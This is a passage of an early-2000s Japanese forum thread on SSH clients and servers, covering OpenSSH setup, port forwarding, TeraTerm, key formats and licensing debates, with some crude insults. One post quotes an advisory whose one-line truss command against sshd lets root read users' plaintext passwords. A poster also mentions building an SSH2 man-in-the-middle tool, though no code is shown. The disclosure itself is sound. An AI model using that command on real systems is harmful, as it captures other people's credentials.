「ssh接続が確立した時点」＝通信路を共通鍵暗号で暗号化するために必要な鍵の交換が終わった時点
「認証が通った時点」＝文字通り、認証にパスして、フォワーディングなどのセットアップが終わった時点

ちょっと古いけど、これ読め。
http://www.itojun.org/paper/wide-9811-ssh-tutorial/

>>169 - 173
みなさんご親切にありがとうございまひた
さよか、わてはまだ鍵の交換ができてないのに
認証を焦ってまひた
がんばりまふ

>>173　をいとぢゅん氏のか

ログイン時 .bashrcで、fortune等を実行していると,scpが利用できなくなります。
なんとかfortuneを実行させたいのですが、
シェルスクリプト等でscpによるセッションを判定できる方法ってありますか？

.bash_profile
.bash_login
.profile

>>177
cygwinスレに詳しく書いてあったので .bash_profileから実行してみました
そうすると、ログイン時しか表示されなくなります。
ktermなどの端末を開いた時すべてで表示させたいんです。

あ、全ての端末でログインオプションをつけりゃいいのか。

$PS1とか$BASHとか。
あるいは、ttyを持っているかどうか、という基準で
if tty >/dev/null 2>&1
という手もあるかも知れない。

環境変数 SSH_TTY を確認すべし。

SSH のポートフォワーディングで、 Windows のファイル共有のためのトラフィック通せませんかね？
つまり NetBIOS over TCP/IP を通したいってことなんですが…
素直に PPTP　とかで VPN 張れってのは、無しの方向で。

WebDAV にしとけ ってこれも余り好ましくないけどな

こんなの来たんだけど (((；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ???

OpenSSH 3.4p1 Allows Revealing of Password (Privsep Feature)
------------------------------------------------------------------------
SUMMARY

During authentication, OpenSSH 3.4p1 with privsep enabled passes the
cleartext password from the main process to the privsep child using a
pipe. Using strace or truss, root can see the user's plaintext password
flying by. Andrew observed this behavior from OpenSSH 3.4p1 built using
GCC on Solaris 2.8 and the current Debian OpenSSH 3.4p1 package.

DETAILS

The level of effort to determine clear text passwords, for even the most
inexperienced UNIX administrator, is almost zero given the above. Andrew
realizes that no matter how you slice it, it will be possible for root to
grab the password from wherever it is stored in memory. Alternatively,
recompile SSHd to log the password, or any number of other ways. However,
the methods Andrew just mentioned all require someone with significantly
more know how than:
truss -fp `cat /var/run/sshd.pid`

Vendor response:
Theo and Markus told Andrew that this is not an issue. Theo says that you
cannot prevent root from determining a user's password. Andrew does not
disagree but asked why OpenBSD bothers to encrypt user passwords at all if
that is his attitude.

ここが笑えますね。

ベンダの反応:
> Theo (de raadt) と Markus (Friedl) は発見者 Andrew に対し、これは問題にはならないと
> 伝えた。Theo いわく、root がユーザのパスワードを見るのを防ぐことはできないからだという。
> Andrew はこれを否定しなかったが、それならなぜ OpenBSD はユーザのパスワードを
> わざわざ暗号化しているのかとたずねた。

OpenSSHが偽物に摩り替えられていた事件で、相当に信頼が揺らいだ
気がする。

のっとられても絶対にファイルのすり替えをできない
ようなFTPサーバーを作ることは可能だと思うが、
どうだろうか？READONLYのファイルシステムあるいはライト
プロテクトのあるメディアにOSとかFTP用のファイルを置き、
ログは別のマシンに転送するという具合にやれば、
のっとられても、何もできないはずだが。。。

>>182 できます。

>>187
リモートで管理する限り不可能。

>>187
鋼鉄なんとかってやつでそういうのやってるよね

truss するだけなんて、あまりに簡単過ぎ。

main process が privsep child を fork する前に、あらかじめ共有鍵を
つくっておき、通信路をその共有鍵で暗号化するだけで解決するのに、
なんで問題じゃないとかいって見ないふりするんだろ？

Web掲載されたのでage
http://www.securiteam.com/unixfocus/5VP0H2A8AK.html

　　　ま　　　た　　　テ　　　オ　　　で　　　ラ　　　ア　　　ア　　づ　　　か

>>191
rootなんだから、kmemでもなんでも見れるから、ってことじゃないの？
というかrootがその気になればsshd入れかえることだってできるんだし、
見ようと思ったらいつでも見れるでしょう。

でもまぁ確かに、お手軽ではあるけどね。

>>194
乗っ取られた時点で負けというのは確かなんだが、それでもパスワード収集
までに時間と手間を掛けさせるのは、セキュリティ面では意味があると思うな。

そファイル入れ替えは tripwire なんかでトラップが張ってあれば検出できる
可能性もあるしさ。

Theoのあのガキっぽさはなかなか気に入ってるんだけどな。

>>194

もちろんその通りだし、心底悪意のある root に対しては、
RSAAuthenticationのような手段をとらない限り、普通は
対抗しようがない。
じゃ直さなくてもまったく問題がないかというと、そうでもなくて
・侵入者に対抗するするため、実行可能なファイルを置いた
　パーティションは全て read only mount し、侵入者が
　侵入用コマンドを実行できないようにした状態でも、
　システムにあらかじめインストールされているコマンドだけ
　を使って、ごく簡単に password を盗める
・悪意のある侵入者ではなく正規の管理者が、ちょっとした
　できごころを起こした場合にも危険
といったことを考えると、やはり問題だろ。

> Theoのあのガキっぽさはなかなか気に入ってるんだけどな。

俺はガキに自分の身の安全を委ねたくはないんだけどなー。
現状では OpenSSH 以外に選択肢がないのがなんとも。

> 俺はガキに自分の身の安全を委ねたくはないんだけどなー。

とはいっても、実際には現代人の日常生活の大部分は
何らかのかたちでドキュソに支えられてるわけでさ。

>>198
そう言うのが嫌な人はこっち使えばいいんじゃないの？
http://www.ssh.com/

？ttp://cr.yp.to/djbssh.html

>>199-200
どっちもライセンスの問題で安心して使えない罠

>>200 みえない…

>>202
だってないもん。

>>203 (T_T)

>>202
djb 厨には見えてるらしい

「サンがOpenSSLプロジェクトに暗号化技術を提供」
http://japan.cnet.com/Enterprise/News/2002/Item/020920-3.html

これって使用もfreeなのかな?
だったらsshでも、鍵交換にECDHアルゴリズムを使ったり、
/etc/ssh/ssh_host_ecdsa_key なんてファイルができてたり
するようになるのかな。

ttp://www.ayera.com/teraterm/
TeraTerm Pro Web 3.1.1 - Enhanced Telnet/SSH2 Client
ｷﾀｰ

>>207
マルチうざ

>>207
やったー。情報ありがとう。
>>208
マルチでいいのと悪いのと区別しろYo

>>207
ttp://www.ayera.com/teraterm/ttermpro_311.zip
ダウソできませんが、何か?

>>209
うぜぇのはうぜえよ。

>207=209
分かり易すぎ

>>209
[email protected]に掛け合ってみますー。
ということでメール出してみました。

ﾀﾞｳｿできない。

>>212
ちがわい。>>209はただtsshの糞ユーザに過ぎんがな、
一回SSH2のサーバ作ってつながらなくて苦労した馬鹿だ。＞漏れのこと
漏れの他にも感動してる奴に>>210なんてのもいるじゃん。
>>207は大人だ。

>tssh
（ ´,_ゝ｀）ﾌﾟｯ

tssh って何！？

>>216, >>217
tsshってｔｔｓｓｈのことです。手が滑ったのが
分からないお前らはｱﾌｫですか。

Tera Term SSHってttsshって略すのか。漏れ、tcshかと思ったよ…。

略でなくて、TTSSH が正式名でなかったっけ?

でもなぁ、もう PuTTY に慣れちゃったし、いまさら感が否めないなぁ。

まだPuTTYに手を出したばっかりの漏れには朗報ナリ。
一応期待。

今さらteratermのダッサイインターフェースなんかに戻れない

今さらWindowsのダッサイインターフェースなんかに戻れない

今さらcommand.comのダッサイインターフェイスなんかに戻れない

>>225
まぁ少なくともbashやtcshに比べたら遥かにダサイわな。

>>225
cmd.exe っていうのがかなりイイらしいよ

>227
50歩100歩
どんぐりの背比べ

>>227
それより ssh ってのがかなりオススメ

>>207
現在も>>210と同様、ダウンロードできないのだが…、ダウンロードできた人いる？
いたら使用した感想などをｷﾎﾞﾝﾇ

>>230
ダウソできたよ！

TTSSH組み込んだ感じとほぼ同じ。SSH Forwardが無い。
謎のHTTPサーバ機能が付いてる。

>>231
ssh でつないで、ls -l ~/ とかやると、
[ENTER] を何度か打たないとリスト全部を表示できない。
バッファリングまわりが変なのかなぁ？

>>213
CEOから謝罪メールが返信されてきますた。
かなり吃驚。

>>232
もしかして使えない？

>>234
こんなんなるの俺だけなのかなぁ？ほかのひとは大丈夫なの？
サーバ側は、FreeBSD 4.5 の OpenSSH 3.4p1 で、特別な設定は特になし。
クライアントは、SSH 関係の設定はデフォルトのまま、圧縮とかもなし。

>>232
家も同じく。

WinXPにコレと、相手はVine2.1にOpenSSH 3.4p1
圧縮は無し。

>232
うちでも同じ。
接続先は Solaris 8 + OpenSSH 3.4p1

あと、EUC が使えないことに気づいたんで、
もう削除しちゃいました。
SJISなら一応表示はできてたけど。

>>237
WinXP ですが、うちでは Setup のデフォルトの SJIS を EUC にして EUC 使えたよ。

確かに表示が変だね。

公開鍵認証には対応していないのかな？

>>240
うーむ、公開鍵認証オンリーにしてるから接続すらできん...

表示変だね。バッファに入ってるものが詰まって出る
みたいな感じ。文字化けとかは無くって、EUCで問題ないよ

screen使ってmew@emacsとか使うと画面切り替わりの際の
^Lは必須。この点だけでも直してくれないかなあ。

てか、わざわざ TeraTerm 上に載せる意味なんかあるの？

基本的な機能は TeraTerm のを利用するから 0から作るようりは簡単とかじゃない？

LAN 上の Windows から普通に接続してもこんなのが記録されるね。

Did not receive identification string from 192.168.0.3

>>243
シリアルコンソールも telnet も SSH も SSH2 も
みんな同じソフト上でできるならそれに越したことないんじゃない？

>246
PuTTYも全部できるが？

ごめん、微妙に嘘ついた。シリアルは出来ないね。
でも全部詰め込むメリットって何？

1つあれば用が足りる。

Tera Term に慣れてるから、とか。
なぜそんなに詰めこむのを嫌うの?

djb信者のかほり〜

toolbox approach ?

TeraTerm Pro Web 3.1.2 - Enhanced Telnet/SSH2 Client 
となっているんで試したのですが、皆さん^H^H^Hお前らと同じ状況ですね。
バッファリングが変。
[Setup]-[Recurring Command]ってなに？
3.1.1 の頃からあるのでしょうか？

俺 TeraTermPro + ttssh 使ってるなぁ。
Macro 結構組んでるから今更違うのに変えるのも面倒だ。。
そういえばなんで PuTTY 使わなかったんだろう。
良く覚えてないや。。

WinSCPは使ってるけど。。

>>240

Win2000 で putty の pagent を常駐させているのだが、そっから勝手に鍵データとってきて、公開鍵認証やるみたい。
ユーザ名を指定するだけで、パスワード無しで接続されてしまった。

いきなりですみません、WinSCPで質問なのですが・・・。
実は以下のことで確認をしたいので、どなたか親切な方、
教えてやって下さい。

とあるファイル「TEST.TXT」に対して、グループを設定しました。
そのグループに仮にですがAとBというユーザーが含まれています。
TEST.TXTのOWNERは、ユーザーAになっています。
ファイルのパーミッションは、664です。

そこでユーザーBが、サーバー側にあるTEST.TXTと同名のファイルを
ローカルからサーバーへアップロードをさせようとすると
「OPERATION NOT DENIED」と表示されてしまい、上書きの
アップロードをすることができません。
WinSCPでは、OWNERが違うとグループが同じでパーミッションでも許可して
いてもファイルのOWNERと違うユーザーは上書きアップロードをすることが
できないのでしょうか。

よければ教えてください。
どうも失礼しました

>>256
そのファイルがあるディレクトリの
owner と permission はどうよ。

がいしゅつかもしれませんが

ssh2 のログイン情報等は /var/log/messages に出力されていると思いますが
ssh2関連の情報だけを、別のログファイルへ (ex: /var/log/ssh2_log etc...)　出力する事は可能なのでしょうか？

>>>258 /etc/syslog.conf

>>259

はい、/etc/syslog.conf に

# ssh2d login
*.sshd2 /var/log/sshd.log

に、記述し、syslogdにHUPをかけたのですが、うまく sshd.logには、出力されないのです。

記述の仕方が間違っているのでしょうか？

>>260 はい。

>>257
ファイルが入っているディレクトリのグループは、ファイルと一緒ですが、
OWNERはAでもBでもないまた別のアカウントです。
これではいけないでしょうか。

>>260
OS は何?

>>261
正しい記述の方法をご教授頂けますと深甚です。

>>263
RedHat Linux 6.2 です。

>>264
OpenSSHに変えて、sshd -e 2> LOGFILE で解決しる

>>264
なぜ man を調べようとしない？

>256
logging を on にして、詳細をみてみるとか

>>155 のやり方で OpenSSH で生成した SSH2プロトコル用の鍵（公開鍵および秘密鍵、念のためDSA および RSA どっちも）を SSH Communications Security Corp の SSH Secure Shell で使うべく変換しました。
で SSH Secure Shell からインポートしたら確かにインポートされました。
鍵一覧表示には 「1024-bit DSA, converted from OpenSSH by ore@orenohost」 と表示されています。
が、これを使って認証ができません。また、秘密鍵のパスフレーズの変更もできないようです。
もちろん SSH Secure Shell 自身で作った鍵なら認証もパスフレーズの変更もできます。
やはり OpenSSH と SSH Secure Shell の間での鍵の共有はできないのでしょうか？

OpenSSH は Cygwin 上のものと Debian GNU/Linux のものを試してみました。

ところで SSH の呼称ですが、
プロトコル自体を表す場合は SecSH
SSH Communications Security 社のクライアントを表す場合は SSH Secure Shell
オープンソースのクライアントを表す場合は OpenSSH
ということでいいんでしょうか？

>>269
> オープンソースのクライアントを表す場合は OpenSSH
OpenSSH はサーバも含むし、
OpenSSH 以外にも open source の SSH ソフトウェアはある。

>>270
そ、そですね。じぶんも OpenSSH の sshd 使ってながら…
PuTTY などもソースコード公開されてますしね。

なんか勘違いしていたようです。
秘密鍵は変換できないんですね。

ssh-keygen -e -f id_dsa

の出力を良く見ると

---- BEGIN SSH2 PUBLIC KEY ----

で始まってる・・・異なるクライアントなんだから、秘密鍵は作り直せってことですね。

さらばOpenSSLなのか。。。

OpenBSDって、やること極端ね

TheoSSL の発表はいつですか(w

>>273
どういうこと?

OpenSSH 3.5 がそろそろ出るよn.

>>275
http://marc.theaimsgroup.com/?l=openbsd-misc&m=103280816316720&w=2

>>277
フリーを保つという姿勢は立派だが、最後の二行で喧嘩売りすぎ。Theo 節が
冴え渡っとるな。

いやぁ、まぁ潔癖をつらぬくためにはソレくらいの喧嘩腰でないとだめかも試練。
俺的には、消して極端とは思えない。

潔癖症といえば、 Debian も潔癖症だね。

>>279 ごめん、誤字多すぎた。

>>277
> the licence on the new code basically builds a contract that says "if
> you use this code, you cannot sue Sun".
このライセンスの原文ってどこにあるの？

訴訟を起こせないといっても要するにBSD ライセンスや MIT ライセンスの
責任放棄の表明と変わらんような気もするんだが。(THIS SOFTWARE IS
PROVIDED "AS IS" ... 以下ね)

Debian の ML でも出た話題。
http://lists.debian.org/debian-legal/2002/debian-legal-200209/msg00183.html
結論、non-free になる。

Debian は徹底した「フリー」主義だからなぁ。
Scial Contract （憲章？） http://www.debian.org/social_contract
What Does Free Mean? http://www.debian.org/intro/free

ライセンスの問題とは関係ないけど、 CNET の記事。
http://msnbc-cnet.com.com/2100-1001-958679.html?type=pt&part=msnbc&tag=alert&form=feed&subj=cnetnews

これか。
http://marc.theaimsgroup.com/?l=cryptography&m=103253111420211&w=2

>>282
non-free だからといってメンテされないわけではない。
モノによるが。

参考: BOF 報告
http://pc.2ch.net/test/read.cgi/linux/1030178687/764
http://pc.2ch.net/test/read.cgi/linux/1030178687/808

>>283
確かに ECC のコードに関しては、従来の OpenSSL のライセンスよりもかなり
キツいね。

ただ、そのライセンスは ECC 使う場合にのみ関係してくる話で OpenSSL の内、
OpenSSH が利用している部分には無関係だから、神経質になる必要はないと
思うけどな。GPL と違って「混ぜるな危険」という性質のライセンスでもないし。

もちろん Debian が OpenSSL を non-free と分類するのは正しいし、それは
一貫性のある見識。でも BSD ライセンスを採用している OpenBSD でそこに
拘るのは違うような気がする。

>>269
>ところで SSH の呼称ですが、
>プロトコル自体を表す場合は SecSH

「ｾｸｰｼｭ」？

>>286
そのつづりで長音が入るとは、どこの訛りだ？

2ちゃんねる

●っ●●→●●ー●のパターンですな
ﾏﾀ-ﾘ
ｾｸ-ｽ
などなど

●●ー●ﾆﾔﾘ

http://cr.yp.to/djbssh.html
もうすぐ



出してくれないかなぁ・・・

djbがSSHなどという複雑怪奇なプロトコルを実装するとはとても思えない。
やるとしたらまったく別の、もっと単純なプロトコルで、
暗号化と認証とインタフェイスをべつべつのプログラムに分けるだろう。
そしてたぶん最初は windows クライアントがなくて、使えねー、ということに
なると思う。まあやんないと思うけど。

>>291は「djbなら安全」とかいう知識をどっかから聞きかじってきただけで、
どうせdjb関連のツールなんてろくに使ったことないでしょ。
djbも名前が一人あるきしてるな。

学者としてのdjbの専門はいちおー暗号なわけだから、
sshに使うかどうかは別として、ライブラリぐらいなら作っても不思議はないと思われ。

つーか、ネタにマジレス以下略。オレモナー。

>292
>SSHなどという複雑怪奇なプロトコル
SSH自体は全く複雑でも奇怪でもないと思うが。
複雑なのは、それを実装しているプログラムかと。
それこそdjbの思想の出番でそ。djb自身は動きそうに無いけど。

てか、ネタにm（略

>SSH自体は全く複雑でも奇怪でもないと思うが。

互換性がないバージョンが2つあるのは十分複雑だと思うが。
SSH2だけでも、djbが嫌ってるRFC822よりは十分複雑。

>学者としてのdjbの専門はいちおー暗号なわけだから、

例の訴訟に勝つまでは暗号関係のプログラムは公開しないんじゃないかなあ。

>>295 しかし RFC822 はもはや変更しようがないし。

>>291
みんなが騒ぐから……
ttp://djbsshd.qmail.jp/why-not.html

しつこいがきんちょだなあ
面白くないっつの

djb 厨は妄想癖が強い割に想像力が貧困な香具師ばかりだな。氏ねや。

FreeBSDにOpenSSHを入れようとしてみました。
すると、./configureとmakeまでは何にも問題ないようでしたが、
make installしたら、
id: sshd: no suth user
WARNING: Privilege separation user "sshd" does not exist
って出て止まりますた。
sshdユーザが必要だったんですか？まったく気づきませんでした。
このユーザは名前がsshdなら何でも良いのでふか？
特権分離ユーザ・・・？ってなに？素人丸出しでスマソ。

>>300
標準で入っている OpenSSH じゃ満足出来なく ports を使う事も拒むとは
よほどのパワーユーザ様なんですね。
尊敬しちゃいます。

>>295
> SSH2だけでも、djbが嫌ってるRFC822よりは十分複雑。

# そもそも「プロトコル」であるSSH2と、mailの「フォーマット」を
# 定義しているRFC822とを比較するのはナンセンスだと思うが…

RFC822はその曖昧さが実装を面倒にさせている原因だろ。
おまけに、MIMEのような拡張があったり、RFCに厳密に準拠していない
agentの面倒もみなくちゃならなかったりするからな。

一方、SSH2(secsh)は記述量こそ大きいが、状態遷移は
非常に単純なプロトコルだし、Packetのフォーマットも
単純で厳密。
http://www.ietf.org/html.charters/secsh-charter.html

勉強がてらdsniffのsshmitmをSSH2に対応させたものを
作ってみたことがあるが、暗号化/復号部分をOpenSSLに
まかせれば、Transport LayerやAuthenticationの部分は
あっという間に作れてしまうぞ。

# 少なくともSSH2よりIMAP4の方が複雑だと思うな。

>>296
え゛？RFC2822は？

てゆーかRFCは定義じゃないんだが。
曖昧なのも当たり前。厨房かお前ら。

>302
djbはOpenSSLも信用しないだろうな（藁

>>305 あ、オレもopensslは信用してないよ。

opensshは信用してるわけ??

>>297
これ、原文はどこなんですか。最近の前里予さんはだいぶカドが取れた
感じがするけど、やっぱちょっとアレルギーがあるので。

(･∀･)ｼﾞｻｸｼﾞｴﾝﾃﾞｼﾀ

djbがssh実装して、theoと煽り合戦するとこみたい。金払うし。

面白くなって参りました！

>>311
おーい、皆んな緊張しちゃって面白くないこと書けなくなっちゃったぞ。

あの・・・・ sftp って初めて知った。
名前だけは知ってたけど、sslwrapper + ftp と思ってた。
逝ってヨシ？

>>305-306
OpenSSLを使うって言っても、暗号ライブラリの部分だけ。
(ソースでいうとcryptoディレクトリの下)
直接入出力に関わる部分じゃないし、そもそも暗号ライブラリって
アルゴリズムの塊だから、自分で実装しなおすメリットはあまりないかも。

# まあ、OpenSSLのSSL/TLS実装部分はごちゃごちゃしすぎて
# 信用できないってのには激しく同意。
# つーか、実際大穴があいていたし。
# http://www.cert.org/advisories/CA-2002-23.html

>314
djbは libc すら信用しない人ですから

>>315
> djbは libc すら信用しない人ですから
そうだった…スマソ

いいかげん djb 厨の妄想ネタは余所でやってくれよ。

>>317 ここらがいいかも。
http://pc.2ch.net/test/read.cgi/unix/1029619161/l50

スレ汚し記念カキコ

>>315
> djbは libc すら信用しない人ですから
でもシステムコール (というかカーネル) は信用してるのね。

> でもシステムコール (というかカーネル) は信用してるのね。

信用できる部分をなるべくせばめる、ということでは。

UNI×系OSにおいてカーネルとの唯一のインターフェースであるシステムコールを否定したら何も残らないじゃん

つーかスレ違（略

djbBSD, djbLinux希望!!

>>323
余所でやれと言ってるだろ。氏ね。

これだからdjb厨房は…

ssh の ml 厨房が多いな

日本語の ssh の ML なんてあるんだ。

今日、OpenSSHとTTSSHを導入して、SSHバージン卒業たばっかなんで
優しくお願いしますね。

で、telnet止めてログインしてみたんだけど、鍵がなくてもアカウントとパス
ワードで入れるじゃないですか？

てっきり鍵セットがないと、ログインできなくなるんで安心なのかと思って
たんですが、違うんですかね？

カギのないホストからは、アカウントとパスワードが合っていても入れなく
はできないんでしょうか？

>>328
> カギのないホストからは、アカウントとパスワードが合っていても入れなく
> はできないんでしょうか？
できます。

>>329

それは、OpenSSH+TTSHでも可能なんですか？
良かったら、方法を教えてください。

>>330
man sshd_config

>>330
PasswordAuthentication no

>>332
甘やかすなよ。

>>331
>>332

sshd_config を設定して再起動したらできました。
ありがとうございました。

>>333

すいませんね。
今度,OpenSSHセキュリティ管理ガイド　買おうと思ってます。

＃導入書には、sshd_config は触る必要ないって書いてありました

>>335
> ＃導入書には、sshd_config は触る必要ないって書いてありました

(ﾟДﾟ)ﾊｧ?

>>328
ChallengeResponseAuthentication no
も設定しておくべし。
http://home.jp.FreeBSD.org/cgi-bin/showmail/FreeBSD-users-jp/71239

すみません。自分なりに調べてみたけれどわからなかったので、質問させてください。

OpenSSHからSSHにSSHエージェントをフォワードして使うことはできないのでしょうか？
もし何か方法があるなら教えて欲しいのですが。

普通にsshエージェントを動かすように設定すれば使えるよ

リモートマシンで
echo $SSH_AUTH_SOCK
とやって何やら表示されてればagent forwardingがきいている。

ADSL + DynamicDNS なホストに、slogin する度に、known_hosts が、
どんどん太っていくんで、困っているんだがなにかいい方法ない?

回答ありがとうございます>>339 >>340
リモートマシンで
echo $SSH_AUTH_SOCK
とすると、
Undefined variable
と表示されてしまいました。何かおかしいところがないか勉強しなおしながらやってみます。

>341
DDNS

>>338
>>339
>>340
http://www.first.tsukuba.ac.jp/~kiyotomo/aboutopenssh.html
詳しくないけど、こんなのがあるから
agent forwardingが効かない場合もあるんじゃないの？

>>341
おれのとこでは太っていかないなぁ。あれってIPアドレスで見てるのかな。ホスト名でみてるんじゃない？ちなみにおれは $HOME/.ssh/config に StrictHostKeyChecking yes って書いてる。

>>345
お、それでいけますた。サンクスコ。

SSHとは直接関係ないんですが、他に適当なスレが見当たらな
いので、質問させてもらいます。
自宅のTeratermでunix(Solaris)サーバにアクセスしてます。
１つのサーバは、emacs -nwもコンソールでも正常に日本語が
表示されますが、もう一つのサーバではコンソールは問題ない
のですが、emacs -nwでは、日本語表示が'????'になってしま
います。正常な方は.cshrcにLANG=jaとなっていて、異常な
方はLANG=japaneseとなっています。でもコンソールは問題
ないのでこれが原因とは思われません。.emacsは同じ記述で
す。何かお心当たりはありませんでしょうか。

表示がうまくいかないほうのサーバもLANG=jaにしたらどうなりますか？

>>349
レスありがとん。
.cshrcで'set LANG ja'にしてもだめでした。
実は正常に日本語表示できる方は、emacsではなくmuleでした。
日本語表示できないほうは、emacs20.6です。
.Xdefaultsは、-nwで起動するときは効いてこないのですよね。
.Xdefaultsには違いがあるんですが関係ないですよね。

set してどーする。setenv だろ。
つーか、ssh 関係ない。くだ質あたりに逝ってらっしゃい。

>347
~/.emacs の見直し
てか禿スレ違い

Soralis7 (Sparc)に OpenSSH 3.4p1をインストールしたんですが
sshd起動時に"特権分離と圧縮は使えない"みたいなメッセージが
でます。特権分離が有効になる条件は何でしょうか？
インストールは ./configure; make; make install
でやってます。

>>352
がいしゅつ過ぎ。
README.privsep 読め。

OpenSSH 3.5
http://www.openssh.com/

ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!

portableはまだか?

>>352
圧縮をやめよう

>>354
まだどこにもファイルねーじゃん

ﾎﾝﾄﾀﾞ

そして失われた信用は永遠に取り戻すことは出来なかったとさ。
めでたしめでたし。

cd src; cvs up usr.bin/ssh

3.5p1、ftp.openbsd.orgでダウソしますた

今回も毒入ってた?

- MD5 (openssh-3.5p1.tar.gz) = 42bd78508d208b55843c84dd54dea848
- MD5 (openssh-3.5.tgz) = 79fc225dbe0fe71ebb6910f449101d23

>>347 - >>351でお世話になったものですが、
TeraTerm上で、emacs -nwで日本語が化けていた原因が
分かりましたので一応報告させていただきます。
(set-terminal-coding-system 'euc-jp)
を入れたらＯＫとなりました。このサーバはこの前まで
私の机にあったので、直接サーバー機にログインしてやって
ましたので、これがなくても大丈夫だったのですた。
スレ汚しスマソ。

>>365
最初にチェックすべきとこだな、おまけにスレ違い、あほんだらが。

>>366
　（;´Д｀）　　ｽﾐﾏｾﾝｽﾐﾏｾﾝ
　（　 八)
　　　〉 〉
許してくらさい

>>367
SSHについては
　　http://www.unixuser.org/~haruyama/security/openssh/support/
の本読んどけ。ぜってー損はしないからな。

>>368
> ぜってー損はしないからな
主語は「貴方が」ですか？

煽りでないとして…

>>369
「少なくとも」私は読んでよかったと思ってます。

大学から家にsshでつなぎたいんです。
http://www.gcd.org/sengoku/docs/NikkeiLinux01-01/telnet.ja.html#COMMAND
ここ見てやってます。

ProxyCommandを指定すると、

・Linux(Vine)からは、とりあえずプロキシコマンドを読むところまでは行く(繋がらないけど)。

・Windows(2000)からTeraTermや本家SSH(?)で試すと、
/bin/sh: ~/.ssh/proxy-telnet: not found
ssh_exchange_identification: Connection closed by remote host
とでて終了します。(これは本家SSHの結果。TeraTermでも同じ意味の結果がでました)
何が原因でしょうか？

Unix初心者で大学の計算機の構成が良くわからないんですが、
とりあえず個々のPCにWindows2000とVineLinuxが入ってて、
WindowsからはTeraTermで学内のTelnetサーバかSSHサーバにログインして操作します。
本家SSHで試したのは、家からダイヤルアップPPPで学校に接続して学内SSHサーバにログインし、
そこから家に接続しかえそうとしたときです。

>>371
> 大学の計算機の構成が良くわからないんですが
おまえがわからないものが俺らにわかるはずが無い管理者に聞け。

>>372
似たような環境もたくさんありそうで、一般的な症状だったら
解決策がわかる人もいるかもしれないと思ったんですが。

>>373
んじゃ、似たような環境の人がくるまで根気良く待っててください。

/bin/sh: ~/.ssh/proxy-telnet: not found
これが全てだと思うのですが、ファイルあんの？

>>375
レスありがとうございます。

例えば、>>371のエラーが出た直後に
mule ~/.ssh/proxy-telnet
とすればちゃんとファイルが開きます。

>>376
あんたのログインシェルはbashかcshか知らんが、
/bin/shではチルダ使えんよ。絶対パスで指定ｽﾚ

ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!
大学のログインシェルがtcshだったからLinuxからはうまくいってたんですね！
絶対パスを指定したらTeraTermからプロキシコマンドまでは実行できました。
デフォルトのtcshしか使ったことなかったから知らなかったです…お恥ずかしい。
でも
mule ~/.ssh/proxy-telnet
でちゃんとファイルが開けたのがなぜかはわかってません。

>>377さんありがとうございました！


…さてやっとここからが本番か…

>…さてやっとここからが本番か…
この調子じゃ先が思いやられるのお。大学のみならず人生も…

>>379
おかげさまで目標達成しました。
次はファイルサーバ立てようと思います。

ネタだと言ってくれ。

ssh -f でバックグラウンドに移行したプロセスの pid を得る方法ってある？

vnc をポートフォワーディング使って vnc 終了させたらそのまま
フォーワディングしていた ssh プロセスも終了させたい

#!/bin/sh
ssh -2CNf -L 5900:192.168.0.1:5900 -l hoge remote.domain
vncviewer localhost
kill $PID

ここで PID が解からない!?
bash でも csh 系でもいいです。

これって本当か？

↓　↓　↓
http://www.dream-express-web.com/space-trust.htm

>>382
pgrep つかえや

>>384
Thanks :-) 結局 pkill にしますた
確実に forwarder プロセスを見つけようと思ったけど、
ローカルポート指定している時点でユニークに決まってるもんな。

openssh3.5が出ていたのでインストールしました。(FreeBSDです)
そのときopenssh3.1でport22が空いているサーバへ接続し
cvsupをしportsからopensshをインストール
その時点でtelnet localhost 22　とすると古いバージョンが出ますが
/usr/local/etc/rc.d/sshd.sh stop
/usr/local/etc/rc.d/sshd.sh start
と、すると
telnet localhost 22 SSH-1.99-OpenSSH_3.5
と、なり最新版の返事が返ってきました。
で、質問なのですがstopしたときに切れなかったのが謎です。
なんでしょうか？

>>386
stop のときに何をしているか見ましょう。
ちなみに、sshd は、ご主人プロセスだけを殺すことが可能です。

>> 382
リモートコマンドに「sleep 20」とか指定してssh起動すれば、
フォーワディング上のプロセスが終了した時にsshも自動で終了できたり。

>>386
前のプロセスが生きてただけだろ・・・

OpenSSHのマシンからSSH2のマシンを経由して
その先のOpenSSHのマシンにファイルを転送したいのですが
（できればSSH2のマシンに一時ファイルを作らずに）
なにかよい方法はありますでしょうか？

>>390
> OpenSSHのマシンからSSH2のマシンを経由して
> その先のOpenSSHのマシンにファイルを転送したいのですが

“その先の OpenSSH のマシン”の port 22 をどっかの port に
LocalForward するようなオプション付けて OpenSSH のマシンか
ら SSH2 のマシンに slogin。

で、OpenSSH のマシンで

scp -P 'どっかの port' path1 localhost:path2 (なりなんなり)

>>391
どうもありがとうございます。できました。
ポートフォワーディングの使い方を知らないことが
もろばれになってしまった気がします。

わからないついでにもうひとつ聞きたいのですが、
間にあるSSH2のマシンが二つ（あるいはそれ以上）ある場合には
どのようにすればいいのでしょうか？

マシン１（OpenSSH）−マシン２（SSH2）−マシン３（SSH2）−マシン４（OpenSSH）
みたいな構成で、マシン１から４へファイルを転送したい場合です。

>>392
> マシン１（OpenSSH）−マシン２（SSH2）−マシン３（SSH2）−マシン４（OpenSSH）
> みたいな構成で、マシン１から４へファイルを転送したい場合です。

マシン２→マシン３にsloginしてマシン４のport 22をマシン２にフォ
ワード。

で、マシン１からマシン２にフォワードされたポートへscp。

マシンが 5 台以上ある場合にもフォワードされたポートをさらにフォ
ワードしてやればいけるんじゃないかな。やったことはないけど。

SSH2 なら cipher=none が使えるから、多段になってもたぶん大丈夫。

あと重要なのは GatewayPorts を yes にしとく。see ssh2_config。

>>393
どうもありがとうございます
ためしに実験してみたらうまく動きました。
フォワードされたポートをさらにフォワードする
というのもやってみましたが成功しました。
本当にどうもありがとうございました

ttyrec -u
という解もある

ttp://namazu.org/~satoru/ttyrec/

http://sshtools.sourceforge.net/ というのをはけーんしますた。
がいしゅつ？

NFS over SSHとか出来ませんか？

>>397
TCP ならできるんでないの?
使いものになるかは知らんが。

>>397
それ以前に RPC over ssh ができないといけない。

ssh を使わなければならないような回線で NFS して何かうれしいのか問い詰めたい

Secure NFS via SSH Tunnel
http://www.math.ualberta.ca/imaging/snfs/
というページがあります。自分で試したことはありません。

http://www.appgate.com/mindterm/

MindTermの内蔵Pluginの『FTP to SFTP bridge』ってのが既存のFTP
